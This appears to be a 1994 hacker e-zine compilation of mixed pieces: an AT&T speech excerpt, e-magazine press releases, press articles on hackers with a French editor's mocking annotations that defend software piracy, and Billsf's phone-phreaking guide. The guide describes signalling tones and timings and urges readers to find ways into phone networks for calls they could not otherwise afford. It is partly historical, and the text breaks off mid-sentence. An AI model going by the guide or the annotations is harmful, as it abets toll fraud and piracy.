the merchandising services, in color, with full-motion video, and
excellent sound quality.

It's the ability of amateur filmmakers to hire an instructor who
gives lessons, allowing the group to ask questions and see
graphic examples of subject matter -- a dynamic learning
experience on the network.

Or maybe it's language lessons, or a stock market group, or
gardeners, or people who love to gossip -- all highly
communications intensive. That's AT&T's vision. New
relationships -- A new sense of community -- A social experience
not just a technology experience. As you see, the potential of
interactive networks is not found in 500 pre-programmed channels.
The beauty is that consumers have the freedom to choose any
subject or service from the intelligent terminal in their homes.

And instantly the terminal understands what they want, finds that
content wherever it is, and delivers it to their homes, or to
their cars, or to a train or a mall -- wherever they want it
delivered. And they can do that with their own fingers or,
ideally, with their own voice.

The companies that create a rich, innovative and open marketplace
for content providers and end customers comprise what we call
"the missing industry", AT&T's concept of hosting. The
consumer's choice of a host is important, because it creates a
bonded relationship. Consumers will subscribe to a particular
host because they feel it gives them the easiest access to the
people and applications they want, and provides excellent service
and convenience at an affordable price. The point is: It's a
competitive, intelligent hosting environment, with the consumer
in control.

Now let me go back to the other business model: the "gatekeeping"
model. Under this model, the gatekeeper is the consumer's host --
end of story. And the user interface that goes into the
consumer's home will belong to the gatekeeper -- end of story.
Under the gatekeeping model, effectively, there isn't any hosting
industry. When they put their multimedia servers on the head-end
of the local distribution, it cuts out competitive servers from
delivering content retail.

This is why I posed my first question: Will the company that owns
the wires into homes have the right to be the sole gatekeeper in
deciding what interactive content will be made available to those
homes? AT&T believes there's a better way, and we want you to
think about it. *We* want to treat content providers as
customers -- we'll host content in a non-discriminatory way.

There's another issue that strikes to the heart of the consumer
electronics industry, the other question I asked before: Will
vertically integrated gatekeepers have the right to dictate the
kind of intelligent terminal the consumer will use to access
interactive content -- the rental "set-top box" issue.

Designing the "set-top box" or "intelligent terminal" is a big
opportunity for all of us here to build exciting future
generations of TVs, VCRs, telephones, game machines, faxes, PCs,
and personal communicators each of which has intelligence and
memory, is reprogrammable and software-driven, and that connects
to a network.

We believe that cable and local telephone companies should have
the authority to define the interface protocols for their
networks -- for security, encryption, compressions, and
authentication. But they should stop there.

I started this talk discussing intelligence, both in networks and
in networked consumer devices. It is very important that those
of us who agree on open competitive principles stay focused in
1994 on what we do best: assuring that our customers have more
innovation, more choice, more value from us. I can tell you that
we at AT&T are committed to that.

In 1994 I ask you to put energy into making sure that all of us
are full participants in the revolution of interactive
multimedia.

I thank you and invite you to join me in the unveiling of our new
PersonaLink Service -- an important step toward open hosting.


* * P R E S S R E L E A S E * * P R E S S R E L E A S E * *


B R I E F R E L E A S E -- For Immediate Release

FREE ELECTRONIC MAGAZINE ON NEW GENERATION COMPUTING &
COMMUNICATIONS

Free, electronic magazine features article summaries on new
generation computer and communications technologies from over 100
trade magazines and research journals; key U.S. & international
daily newspapers, news weeklies, and business magazines; and,
over 100 Internet mailing lists & USENET groups. Each issue
(10/year) includes listings of forthcoming & recently published
technical books and forthcoming shows & conferences. Bonus:
Exclusive interviews with technology pioneers. E-mail
subscription requests to: listserv@ucsd.edu (Leave the "Subject"
line blank.) In the body of the message, type: SUBSCRIBE HOTT-
LIST (do not include first or last names) Gated to the USENET
group
bit.magazines.computing.


* * P R E S S R E L E A S E * * P R E S S R E L E A S E * *


G E N E R A L R E L E A S E -- For Immediate Release

HOTT -- Hot Off The Tree -- is a FREE monthly (10/year)
electronic magazine featuring the latest advances in computer,
communications, and electronics technologies. Each issue
provides article summaries on new & emerging technologies,
including VR (virtual reality), neural networks, PDAs (personal
digital assistants), GUIs (graphical user interfaces),
intelligent agents, ubiquitous computing, genetic & evolutionary
programming, wireless networks, smart cards, video phones, set-
top boxes, nanotechnology, and massively parallel processing.

Summaries are provided from the following sources:

Wall Street Journal, New York Times, Los Angeles Times,
Washington Post, San Jose Mercury News, Boston Globe,
Financial Times (London) ...
Time, Newsweek, U.S. News & World Report ...

Business Week, Forbes, Fortune, The Economist (London), Nikkei
Weekly (Tokyo), Asian Wall Street Journal (Hong Kong) ...

over 50 trade magazines, including Computerworld, InfoWorld,
Datamation, Computer Retail Week, Dr. Dobb's Journal, LAN
Times, Communications Week, PC World, New Media, VAR Business,
Midrange Systems, Byte ...

over 50 research journals, including ** ALL ** publications of
the IEEE Computer and Communications Societies, plus technical
journals published by AT&T, IBM, Hewlett Packard, Fujitsu,
Sharp, NTT, Siemens, Philips, GEC ...

over 100 Internet mailing lists & USENET discussion groups ...

plus ...

* listings of forthcoming & recently published technical books;
* listings of forthcoming trade shows & technical conferences;
and,

* company advertorials, including CEO perspectives, tips &
techniques, and new product announcements

BONUS:

Exclusive interviews with technology pioneers ... the first
issues feature interviews with Mark Weiser (head of Xerox PARC's
Computer Science Lab) on ubiquitous computing, Nobel laureate
Joshua Lederberg on the information society, and MCC CEO (and
former DARPA director) Craig Fields on the future of computing


TO REQUEST A FREE E-MAIL SUBSCRIPTION, FOLLOW THE INSTRUCTIONS
BELOW

Send subscription requests to:
listserv@ucsd.edu

Leave the "Subject" line blank

In the body of the message input:
SUBSCRIBE HOTT-LIST

If at any time you choose to cancel your subscription input:
UNSUBSCRIBE HOTT-LIST

Note: Do *not* include first or last names following
"SUBSCRIBE HOTT-LIST" or "UNSUBSCRIBE HOTT-LIST"

For your privacy, please note that the list will not be rented.
If you have problems and require human intervention, contact:
hott@ucsd.edu


USENET AVAILABILITY

HOTT is gated to the USENET group bit.magazines.computing
(Late news: Although the bit.* authorities have already approved
the proposed USENET group, gating may be postponed until mid 2Q
94.)


FIRST ISSUE

The first issue of the reinvented HOTT e-magazine is scheduled
for transmission in late February/early March.


PLANNED FEATURES

There are numerous features that I plan to add over the next
year. First, I want to expand trade magazine coverage to over
200 sources, including at least 30 British trade publications.
Also, I want to provide summaries of U.S. and U.K. national news
programs, i.e., ABC, CBS, NBC, and BBC. I'd like to transmit
selected full-text features from The Los Angeles Times, The
Washington Post, The (London) Financial Times, and a Japanese
English-language daily (plus article summaries from a few other
Japanese English-language dailies; there are a half-dozen
English-language dailies published in Japan). Eventually, I'd
like to add The New York Times (if I can negotiate a reasonable
rate), The San Jose Mercury News, and The Boston Globe. And
maybe even Newsbytes and the Japanese English-language equivalent
to Newsbytes. I'm currently negotiating with The Los Angeles
Times Syndicate for Michael Schrage's "Innovation" column
(Michael is willing to comp HOTT on an experimental basis) and
I'd like to add a few other syndicated columns. And I have
several other surprises!


UPDATE -- 7 February 1994

In the last six weeks HOTT has grown from 2,000 to nearly 30,000
individual subscribers (28,856 as of 3 February); this already
makes HOTT the largest circulation electronic serial on the
Internet. And this figure does NOT include distribution points
in the U.S., such as CMU's Computer Science Department, NeXT
Computer, an Air Force BBS at the Pentagon, or the Arizona
Macintosh Users Group (AMUG). An additional 15,000 readers are
being reached through distribution points in over a dozen
countries, including: Canada, the U.K., France, Germany, the
Netherlands, Italy, Norway, Sweden, Finland, Russia, Estonia,
Israel, South Africa, Zambia, Australia, New Zealand, Japan,
Singapore, Malaysia, Thailand, and the equivalent of the U.S.
National Academy of Sciences in the People's Republic of China --
and more distribution points, each representing an average of 500
readers, are being added each week. And as part of our publicity
campaign, we're mailing (by snail mail, fax, and e-mail) this
announcement to over 500 media contacts in the U.S.; this will be
followed in late 2Q 94 with a mailing to several hundred media
contacts in Europe.

Our goal is to make HOTT the first mass distribution AND truly
global periodical on the Information Superhighway. Help us to
achieve our goal by subscribing ... and by informing others of
our offering. Thank you very much.

Bye!

David Scott Lewis, Editor-in-Chief, HOTT electronic magazine;
President, Cellsys, Inc. (a wireless communications company); &
IEEE editor as noted by my signature file

Daytime VOX: +1 818 786 0420 or +1 818 786 8585
Fax: +1 818 994 5026


- 30 -


From MIRROR January 27-February 3,1994

Montr‚al's own high priest of cyberspace, Arthur Kroker, has
already got a wary eye on Vid‚otron's newly announced venture to
make the electronic highway accessible to every home in Qu‚bec -
and every marketing expert in the world. Vid‚otron has teamed up
with the National Bank, Hydro Quebec, Loto-Qu‚bec, Canada Post
and the U.S. giant, Hearst Communications, to create the "Home
Electronic Highway." The consortium plans to test the system in
the Chicoutimi area in 1995.

With Vid‚otron's Home Electronic Highway, TV viewers will be
able to instantly purchase specials offered in television ads,
and other goods. Wired homes will be equipped with the Vid‚otron
interface, as well as a printer with slots for a debit card, a
credit card or a "smart card" -electronic cash.

Kroker, a political science professor at Concordia who is a
much-sought-after commentator on things virtual, was amused by
the consortium's claims that the home highway will be
educational. Kroker firmly believes Vid‚otron really just wants
to turn Canadians into "cybershoppers"-a type of person similar
to those addicted to the home shopper networks in the United
States, most of whom make their aimless purchases after midnight.
"l don't know if you're buying the goods or if you're buying the
chance to connect with somebody," he said.

For Kroker, the most worrying aspect of the Vid‚otron project
is Hydro Quebec's 20-per-cent participation. Hydro is already
boasting that it will one day be able to carry out the
"preparation, sending, consultation and even the paying of
electricity bills" through the highway. Kroker called the idea of
Hydro Quebec remotely monitoring our energy consumption "pretty
ominous."


Montrealers who don't have Internet access but who want a taste
of what e-zines are all about can get one for free on a
relatively new local BBS dedicated to the world of electronic
publications. Started by Pascal Calarco, a first-year master
student in Library and Information Sciences at McGill, Radio City
Zen is small -30 megs, one line- but packed with information
nonetheless. Calarco says users can download hacker zines, such
as Phrack, computer security and information publications,
publications from the Electronic Frontier Foundation, Fran‡ois
Dion's rave-zine, R.U.N., and others Calarco picks up on the Net.

Radio City Zen is online from 8 p.m to 8 a.m. The number is
842-7126.

My apologies: In last week's column, I mistakenly reported that
the owner of Nebula bookstore, Claude LalumiŠre, would set up an
email address for the new store he plans to open on St-Laurent
next month. In fact, there will be no danger!@cam.org; all
requests for info for both stores should be sent to
nebula@cam.org,

-Peter Scowen


- 30 -

[Atreid- Regardez-moi bien la saloperie d'article... Le genre de
merde qui fait croire au gens que les hackers sont des criminels
sans foi ni loi et qui ne font tout ‡a que pour d‚truire
l'univers avec une bombe … neutron...]


Leeched from Action Information
Janvier 1994
vol. 7, no 1

"Language is a virus"
par Steeve Laprise

Les hackers ont bonne presse par les temps qui courent. Le
16 d‚cembre dernier, Jamie O'Meara, jeune hacker de 17 ans,
faisait mˆme la couverture de Hour, hebdomadaire culturel de
Montr‚al. Look rapper, skateboard d'une main, clavier de l'autre,
il posait fiŠrement devant l'‚difice de Bell Canada … Montreal,
ennemi num‚ro un des pirates informatiques qu‚b‚cois.

Et pourtant, le ph‚nomŠne n'est pas nouveau. Le journaliste
Matthew Friedman rappelle que ce sont pr‚cis‚ment des hackers qui
ont fond‚ le laboratoire d'intelligence artificielle du
Massachusetts Institute of Technology, MIT, dans les ann‚es 50 …
60.

Si certains hackers ne sont que de fanatiques informaticiens
qui s'int‚ressent surtout aux jeux et aux logiciels pirates,
d'autres, franchement plus anarchistes, assoiff‚s de destruction
ou de vengeance, con‡oivent des virus informatiques et les
diffusent.

[Atreid- De FANATIQUES informaticiens qui s'int‚ressent aux JEUX
et au piratage?!? J'aime pas quand on m‚lange Warez Puppy et
H/P...
...anarchistes, assoiff‚s de destruction et de vengeance?
Quoi? J'ai bien lu? Tiens quand je parlais de la bombe … neutron
hein?!?]

Qu'est-ce qui peut bien pousser quelqu'un … programmer des
virus? Nous en avons discut‚ avec Philippe Posth, technicien au
ministŠre de l'Industrie, du Commerce et de la Technologie.

"Contrairement … la croyance populaire, ces gens-l… ne sont
pas obligatoirement des g‚nies de l'informatique, dit-il. Un
virus, c'est en g‚n‚ral un programme trŠs simple, de quelques
lignes et il y a sur le march‚ des tas de guides qui expliquent
comment les fabriquer."

En fait, un revendeur de logiciels de la r‚gion
m‚tropolitaine nous apprenait que son meilleur vendeur ‚tait 'The
Hacker's Chronicle', CD-ROM qui fournit une mine de
renseignements utiles aux terroristes en mal de mauvais coups. La
communaut‚ des hackers ne manque d'ailleurs pas de v‚hicules
d'information, dont le bulletin 'Hacker Quarterly', et de
nombreuses autres feuilles de choux underground. Ils communiquent
entre eux par les babillards ‚lectroniques (BBS), soit priv‚s,
soit administr‚s par d'obscurs regroupements tels que 'Phalcons
Small Kids Into Sick Methods'. Ils pratiquent ce qu'ils appellent
le HPCVA, Hacking, Phreaking, Carding, Virus programming and
Anarchy.

M. Posth tente de d‚finir le profil psychologique du
programmeur de virus. "Je vois trois types d'individus trŠs
diff‚rents: premiŠrement d‚linquant, plus ou moins jeune,
deuxiŠmement celui qui cherche … se venger de quelque chose ou de
quelqu'un, et enfin le craqueur de logiciels."

[Atreid- QUOI? Mais o— elle est la v‚ritable et la plus r‚pendue
des cat‚gories? Je ne la vois pas! O— est celle qui dit que les
hackers hackent simplement pour apprendre un peu plus, par
curiosit‚, sans aucune intention destructrice? C'est encore comme
je disais... L…, tous les mountons de lecteurs vont croire que
nous voulons an‚antir la galaxie... Ridicule...]


Le D‚linquant

Comme l'explique M. Posth, le type d‚linquant est un d‚viant
infantile, qui pose d‚lib‚r‚ment un geste de destruction, souvent
sous le couvert de l'anonymat. "Il a le mˆme comportement qu'un
jeune enfant qui s'amuse … rayer les automobiles avec des clefs.
Il d‚truit pour le simple plaisir de faire du tort. Il ne vise
personne en particulier."

Pour bien des jeunes, l'ordinateur est un jouet. Un jouet
combien plus amusant que Barbie ou G.I. Joe. Combien plus
puissant aussi. C'est une r‚alit‚ … laquelle il faut bien faire
face.

"Prenez l'exemple du jeune qui est sur la page couverture de
Hour, ajoute Serge, ‚ducateur sp‚cialis‚ dans une ‚cole
secondaire en p‚riph‚rie de Montr‚al. Ce jeune-l… voulait attirer
l'attention. Il l'a fait de fa‡on n‚gative, mais pour lui,
quelque part, ‡a donne le mˆme r‚sultat. Les gens vont dire de
lui qu'il est brillant, qu'il est fut‚. Personnellement, je ne
pense pas qu'… 17 ans, il en veuille vraiment … Bell Canada."

[Atreid- Ben voyons! Tout le monde sait qu'… 17 ans, toutes les
opinions sont futiles et pas s‚rieuses hein? Pourtant, le gars
continuera surement … hacker jusqu'… 21-22 ans, peut-ˆtre mˆme
beaucoup plus tard, et je suppose qu'il commencera … aimer BELL
CANADA lorsqu'il sera "mature"? Fuck! Get real!]

Mais il n'y a pas que des malfaiteurs en culottes courtes.
Slo, hacker de 30 ans interview‚ par M. Friedman, serait
d'ailleurs bien heureux que les gens cessent de croire que la
majorit‚ des hackers sont des ados. "Je suis un activiste, dit-
il. Je connais mes droits et les utilise. Je suis un anarchiste
et un rebelle, et je n'ai pas trouv‚ ‡a dans une boŒte de Captain
Crunch."

[Atreid- Slo mon ami... Un activiste et un rebelle... Ah! ;-)
Non mais … date, c'est la seule entrevue ext‚rieure qui vaillent
quelque chose...]


Les esprits vengeurs

Le deuxiŠme type de programmeur de virus qu'identifie M.
Posth sont ceux qui agissent par vengeance ou par peur d'ˆtre mis
… pied. "Souvent, dit-il, ce sont des sp‚cialistes qui maŒtrisent
trŠs bien les systŠmes et cherchent … se rendre indispensables
face … leur employeur. Ils vont, par exemple, contr“ler l'accŠs
aux systŠmes informatiques d'une grande entreprise au moyen de
mots de passe qu'ils sont seuls … connaŒtre."

Ces individus, qu'un psychologue ou un ‚ducateur
‚tiquetteraient de "d‚liquants situationnels", agissent souvent
par esprit de vengeance ou de contradiction. Un autre exemple
pourrait ˆtre celui d'un employ‚ qui en veut … son patron, … son
sup‚rieur ou … toute autre forme d'autorit‚, comme les compagnies
de t‚l‚phone, de cablodistribution, les banques, etc.

Peut-on imaginer meilleure vengeance, … une ‚poque o— les
ordinateurs sont omnipr‚sents et gŠrent des donn‚es parfois trŠs
strat‚giques, que d'ins‚rer un virus destructeur dans un systŠme
ennemi?

Aussi bien dans l'entreprise priv‚e qu'au sein
d'institutions gouvernementales, les exemples sont nombreux.
R‚cemment, HP et Novell tenaient un s‚minaire sur la s‚curit‚. On
y abordait entre autre les questions du piratage et de
l'espionnage informatique.

Les c‚geps et universit‚s seraient aussi le site de quelques
supercheries m‚morables. Du genre... la veille d'un examen, ou
juste avant la date de remise d'un travail de session, tous les
ordinateurs du laboratoire informatique ne r‚pondent plus...

Le cas le plus c‚lŠbre est sans doute celui qui, le 3
novembre 1988, a paralys‚ pendant plusieurs jours le r‚seau
Internet. Le New York Times en a mˆme fait la page couverture de
l'un de ses num‚ros. L'auteur de ce crime informatique, Robert T.
Morris, d‚sormais c‚lŠbre, a ins‚r‚ dans le r‚seau Internet ce
qu'on appelle un ver (Worm),...

[Atreid- Voyez l'article de Blitzkreig dans ce mˆme num‚ro!]

...programme qui ‚crase les donn‚es en m‚moire et en ralentit le
fonctionnement par des routines inutiles et r‚p‚titives. Morris
s'en est tir‚ avec 10,000$ US d'amende et trois ans de
surveillance judiciaire.


Les craqueurs de logiciels

Le troisiŠme type de malfaiteurs est celui des craqueurs de
logiciels. M. Posth fait ici r‚f‚rence … ces entreprises ou
individus qui vendent ou diffusent gratuitement les codes d'accŠs
… des banques de jeux ou de logiciels. "D'une certaine fa‡on, ce
sont des virus, parce qu'il modifient ou empˆchent certaines
fonctions logiques d‚finies par les concepteurs logiciels."


[Atreid- Ah oui... D'une certaine fa‡on, ce sont des virus, mais
pas vraiment des virus, parce que virus vient des trojans parce
qu'ils font l'inverse, mais qu'en fait il faudrait trojanter le
virus pour virusser le trojanterie du trojan... Oui je vois...
ComplŠtement ridicule... C'est ‡a pauv'con... Maintenant mˆle
donc plus les gens sur ce qu'est un virus.]


Et voil… donc encore une fois soulev‚e la question du
piratage. Quoi qu'en diront les distributeurs de logiciels et les
organismes de protection des droits d'auteur, un logiciel pirat‚
n'a pas plus de chance d'ˆtre infect‚ qu'un original. Est-il
besoin de le rappeler? Incidemment, on a mˆme vu des
distributeurs de logiciels oblig‚s de rappeler certaines
disquettes infect‚es. Bien s–r, il y a de fortes chances que, si
le prix de vente de certains logiciels ‚tait plus raisonnable,
moins de copies pirates seraient en circulation. Mais cela, c'est
une autre question.

[Atreid- NON c'est pas une autre question pauvre imb‚cile! C'est
LA question! Vous en connaissez beaucoup vous du monde qui
veulent payer 300-400$ pour un logiciel comme WordPerfect? Mais
‡a, BIEN SUR, c'est une autre question hein? Hummm...]



Language is a virus

A tant parler de hackers, de virus, de piratage,
d'espionnage, on devient paranoiaque...

[Atreid- Surtout avec une saloperie de journaliste dans ton
genre...]

...Vite le dernier logiciel antivirus. A cela, M. Posth rapporte
ce qu'un ami informaticien lui avait dit un jour: "Un antivirus,
no way, essaie de me prouver qu'il n'y a pas de virus l…-dessus!"

[Atreid- Parlant de paranoiaque...]

Cela vous surprendra peut-ˆtre, mais selon une croyance
populaire plus ou moins farfelue, mais tout de mˆme r‚pandue, les
d‚veloppeurs de logiciels antivirus eux-mˆmes, pour se rendre
indispensables, inventeraient les virus et les introduiraient sur
le march‚

William S. Burroughs, auteur des romans Naked Lunch, The
Soft Machine et Junkie a popularis‚ l'expression "Language is a
virus". Comme l'explique le hacker-journaliste Bill Me Tuesday
dans Mondo 2000 User's guide: "Les virus comme les mots se
propagent, se r‚pŠtent et se copient. Les mots (comme les virus)
sont vivants de par leur nature et par leur fonction."

[Atreid- Petite anecdote... Je tapponnais sur l'ordinateur d'une
de mes connaissances, appelons-le G‚rard, et une fois termin‚, je
laisse l'ordinateur ouvert quelques instants pour faire quelque
chose d'autre. Lui il me dit: ®Ferme l'ordinateur, je veux pas
que quelqu'un s'infiltre dessus¯, et moi de lui r‚pondre: ®Ah?
T'as un systŠme reli‚ par modem?¯ et vous savez ce que G‚rard a
r‚pondu? Vous en croirez pas vos yeux! Il m'a dit: ®Non j'ai pas
de modem, mais avec les hackers, on est jamais s–r de rien...¯
Ah! Saloperie de mass media et saloperie de gang de
moutons... €a croit tout ce qu'on leur dit... Voil… ce que fait
ce genre d'article dans la tˆte des gens...]


- 30 -


[Atreid- Voici un article qui peut paraŒtre trŠs anodin, mais il
m'a fait r‚fl‚chir... Des kids qui correspondent par Internet...
Moi ‡a m'allume! Rendez-vous compte qu'on est plus qu'… une ou
deux g‚n‚rations du CYBERage (ou autre d‚riv‚...). €a commence
vraiment … devenir un 'New Lifestyle'!]


From Computer Underground Digest 6.10

Elementary Students Make New Friends with E-mail
by David Batterson

Elementary students lucky enough to have computers/modems at
their school can exchange e-mail regularly with pals their own age in
many states and other countries.

Since they are use keyboards to write with, the young students
call each other "keypals" rather than penpals. Unlike many adults who
still find it difficult, these students usually compose their messages
offline and then upload them.

For example, third through sixth grade students in two Maryland
elementary schools have been sending and receiving e-mail for over a
year now. The kids call the METNET BBS, sponsored by the Maryland
State Department of Education and Maryland Instructional Technology.
METNET is, of course, linked with The Internet.

Computer teacher Patricia A. Weeg is in charge of the e-mail
program at the Maryland schools. Mrs. Weeg told me "my kids are doing
super things with The Internet. My younger kids in grade two are part
of an 'Infant Project' with students in Peru, Iceland, Tasmania,
Hawaii and England. A fourth grader of mine has been messaging with a
class in London."

Another way Maryland students send and receive e-mail is on the
MTEBBS (Maryland Technology Education Bulletin Board Service). They
have their own conference called KIDTALK.

Students can correspond in real time too, by taking part in the
KIDLINK Internet Relay Chat (IRC). These IRC chats have included
students from many states and countries.

Students are learning about other countries by using e-mail.
They exchange questions and answers on subjects like customs,
holidays, housing, animals, the environment or careers. One fifth
grader who is interested in engineering wrote to an electrical
engineer in Guatemala to learn more about the field.

In addition to improving students' writing and editing skills,
the e-mail programs serve as an incentive. Students use e-mail as an
extracurricular activity, and have to finish regular class work before
they can take part.

Many teachers use educational games and quizzes to make sure that
time is spent wisely. Prior to 1982's November election, elementary
students in Oregon, Michigan and Maryland were polled on their choice
for President.

Students, parents and educators who want to learn more about
keypals can write Mrs. Patricia Weeg, Chapter 1 Computer Teacher,
Delmar Elementary School, 700 S. Second St., Delmar, MD 21875. Her
e-mail address is: pweeg@source.asset.com.

David Batterson welcomes comments. MCI Mail: 273-7218 or
evfw91a@prodigy.com.
------------------------------

- 30 -


[Atreid- Voici un bon petit texte trŠs int‚ressant, lisez-le
attentivement, il peut surement vous apprendre quelque chose...]

Hitchhikers guide to the phone system..

Phreaking in the nineties

(By Billsf)


Introduction
------------


In this article I will try to introduce you to the most
complex machine on earth: the phone system. It's a guide to
having fun with the technology, and I hope it will help you on
your travels through the network. It is by no means a definitive
manual: If you really want to get into this, there are lots of
additional things you must learn and read.

This article assumes you know a little bit about the history
of phreaking. It is meant as an update for the sometimes very
outdated documents that can be downloaded from BBS's. In here
I'll tell you which of the old tricks might still work today, and
what new tricks you may discover as you become a phone phreak.

As you learn to phreak you will (hopefully) find ways to
make calls that you could not make in any other way. Calls to
test numbers that you cannot reach from normal network, calls to
ships (unaffordable otherwise), and much more. As you tell others
about the hidden world you have discovered, you will run into
people who have been brainwashed into thinking that all
exploration into the inner workings of the phone system is theft
or fraud. Convincing these people of your right to explore is
probably a waste of time, and does not advance your technical
knowledge.

Phreaking is like magic in more than one way. Those people
who are really good share their tricks with each other, but
usually don't give out these tricks to anyone walking by. This
will be somewhat annoying at first, but once you're really good
you'll understand that it's very unpleasant if the trick you just
discovered is wasted the very next day. I could tell you at least
twenty new tricks in this article but I prefer to teach you how
to find your own.

Having said this, the best way to get into phreaking is to
hook up with other phreaks. Unlike any other sub-culture,
phreaks are not bound by any geographical restrictions. You can
find other phreaks by looking for hacker/phreak BBS's in your
region. Having made contact there you may en-counter these same
people in teleconferences that are regularly set up. These
conferences usually have people from all over the planet. Most
phreaks from other contries outside the United States speak
Englisch, so language is not as much of a barrier as you might
think.

If you live in a currently repressed area, such as the
United States, you should beware that even the things that you
consider "harmless exploring" could get you into lots of trouble
(confiscation of computer, fines, probation jail, loss of job,
etc.). Use your own judgement and find your protection.


Getting Started
---------------

The human voice contains components as low as 70Hz, and as
high as 8000Hz. Most energy however is between 700 and 900Hz. If
you cut off the part under 200 and above 3000, all useful
information is still there. This is exactly what phone companies
do on long distance circuits.

If you think all you have to do is blow 2600Hz and use a set
of twelve MF combinations, you have a lot of catching up to do.
One of the first multi-frequency systems was R1 with 2600Hz as
the line signalling frequency, but for obvious reasons it is
rarely used anymore, except for some very small remote
communities. In this case its use is restricted, meaning it will
not give you access to all the world in most cases.

To begin with, all experimenting starts at home. As you use
your phone, take careful note as what it does on a variety of
calls. Do you hear "dialing" in the background of certain calls
as they are set up? Do you hear any high pitched beeps while a
call is setting up, as it's answered or at hangup of the called
party?

Can you make your CO fial to complete a call either by
playing with the switchhook or dialing strange numbers? If you
are in the United States, did you ever do something that will
produce a recording:"We're sorry, your call did not go
through..." after about 15 seconds of nothing?

If you can do the last item, you are "in" for sure! Any
beeps on answer or hang-up of the called party also means a sure
way in. Hearing the actual MF tones produced by the telco may
also be your way in. While it would be nice to find this behavior
on a toll-free circuit, you may consider using a national toll
circuit to get an overseas call or even a local circuit for a
bigger discount. Every phone in the world has a way in. All you
have to do is find one!


An overview of Systems
----------------------

First we must start with numbering plans. The world is
divided up into eight separate zones. Zone 1 is the United
States, Canada and some Caribbean nations having NPA 809. Zone 2
is Africa. Greenland (299) and Faroe Islands (298) do not like
their Zone 2 assignment, but Zones 3 and 4 (Europe) are all taken
up. Since the DDR is now unified with BRD (Germany) the code 37
is up for grabs and will probably be subdivided into ten new
country codes to allow the new nations of Europe, including the
Baltics, to have their own codes. Greenland and the Faroe Islands
should each get a 37x country code. Zone 5 is Latin America,
including Mexico (52) and Cuba (53). Zone 6 is the south Pacific
and includes Australia (61), New Zealand (64) and Malaysia (60).
Zone 7 is now called CIS (formerly the Soviet Union), but may
become a third European Code. Zone 8 is Asia and includes Japan
(81), Korea (82), Vietnam (84), China (86), and many others. Zone
9 is the sub-continent of India (91) and surrounding regions. A
special sub-zone is 87, which is the maritime satellite service
(Inmarsat). Country code 99 is reserved as a test code for
international and national purposes and may contain many
interesting numbers.

In zone 1, a ten digit number follows with a fixed format,
severely limiting the total number of phones. NPA's like 310 and
510 attest to that. The new plan (beginning in 1995) will allow
the middle digit to be other than 1 or 0, allowing up to five
times more phones. This is predicted to last into the 21st
century. After that Zone 1 must move to the fully extensible
system used in the rest of the world.

The "rest of the world" uses a system where "0" precedes the
area code for numbers dialed within the country code. France and
Denmark are notable ex-ceptions, where there are no area codes or
just one as in France (1 for Paris and just eight digits for the
rest). This system has proven to be a total mess - worse than the
Zone 1 plan!

In the usual numbering system, the area code can be of any
length, but at this time between one and five digits are used.
The phone number can be any length too, the only requirement
being that the whole number, including the country code but not
the zero before the area code, must not exceed fourteen digits.
Second dialtones are used in some systems to tell customers they
are connected to the area they are calling and are to proceed
with the number. With step-by-step, you would literally connect
to the distant city and then actually signal it with your pulses.
Today, if second dialtones are used it's only because they were
used in the past. They have no meaning today, much like the
second dialtones in the custom calling features common in the
United States. The advantages of the above "linked" system is
that it allows ex-pansion where needed without affecting other
numbers. Very small villages may only have a three digit number
while big cities may have eight digit numbers. Variations of this
basic theme are common. In Germany, a large company in Hamburg
may have a basic five digit number for the reception and eight
digit numbers for the employee extensions. In another case in
this same town, analog lines have seven digits and ISDN lines
have eight digits. In many places it common to have different
length numbers coming to the same place. As confusing as it
sounds, it really is easier to deal with than the fixed number
plan!


International Signalling Systems
--------------------------------

CCITT number four (C4) is an early system that linked Europe
together and connected to other systems for overseas calls. C4
uses two tones: 2040 and 2400. Both are played together for 150mS
(P) to get the attention of the distant end, followed by a "long"
(XX or YY = 350mS) or a "short" (X or Y = 100mS) of either 2040
(x or X) or 2400 (y or Y) to indicate status of the call buildup.
Address data (x=1 or y=0, 35 ms) is sent in bursts of four bits
as hex digits, allowing 16 different codes. One hundred
milliseconds of silence was placed between each digit in
automatic working. Each digit there-fore took 240mS to send. This
silence interval was non-critical and often had no timeout,
allowing for manual working. C4 is no longer in wide use, but it
was, due to its extreme simplicity a phreak favorite.

CCITT number five (C5) is still the world's number one
overseas signalling method; over 80 percent of all overseas
trunks use it. The "plieks" and tones on Pink Floyd's "The Wall"
are C5, but the producer edited it, revealing an incomplete
number with the old code for Londen. He also botched the cadance
of the address signalling very badly, yet it really sounds OK to
the ear as perhaps the only example most Americans have of what
an overseas call sounds like!

In actual overseas working, one-half second of 2400 and
2600Hz, compound, is sent (clear forward) followed by just the
2400Hz (seize), which readies the trunk for the address
signalling. All address signals are preceded with KP1 (code 13)
for terminal traffic, plus a discriminating digit for the class
of call and the number. The last digit is ST (code 15) to tell
the system signalling is over. For international transit working,
KP2 (code 14) is used to tell the system a country code follows,
after which the procedure is identical to the terminal
procedure.

CCITT six and seven (C6 and C7) are not directly accessible
from the customer's line, yet many "inband" systems interface to
both of thes. C6 is also called Common Channel Interoffice
Signalling (CCIS) and as its name implies, a dedicated line
carries all the setup information for a group of trunks. Modems
(usually 1200 Bps) are used at each end of the circuit. CCIS is
cheaper, and as an added benefit, killed all the child's play
blue boxing that was common in the states in the 60's and early
70's. In the early 80's fiber and other digital transmission
became commonplace, and a new signalling standard was required.
C7 places all line, address, and result (backward) signalling on
a Time Division Multiplexed Circuit (TDM and TDMC) along with
everything else like data and voice. All ISDN systems require the
use of SS7 to communicate on all levels from local to worldwide.

The ITU/CCITT has developed a signalling system for very
wide and general use. One called "The European System", R2 has
become a very widespread inter-national system used on all
continents. R2 is the most versatile end-to-end system ever
developed. It is a two-way system like C7 and comes in two forms,
analog and digital, both fully compatible with each other. R2 has
completely replaced C4, with the possible exception of a few very
remote areas where it works into R2 using using registers. Two
groups of fifteen, two of six MF tones are used for each
direction, the high frequency group forward and the low group
backward. Line signalling can be digital with two channels or
out-of-band at 3825Hz, DC, or in cases of limited bandwidth on
trunks, can use the C4 line signals, just the 2040 + 2400Hz or
3000Hz or even backward signals sent in a forward direction. The
signals can be digitally quantised using the A-law or u-law codec
standards, resulting in compatible signals for analog lines. In
international working, only a small part of the standard is man-
datory with a massive number of options available. For national
working, an ample number of MF combinations are "reserved for
national use", providing an expandable system with virtually
limitless capabilities. R2 is the "system of the nineties" and
mastering this, for the first time, allows the phone phreak "to
hold the whole world in his hands" in a manner that the person
who coined this phrase could have only dreamed of in the early
seventies!

With the exception of bilateral agreements between
neighboring countries to make each other's national systems
compatible, especially in border regions, all international
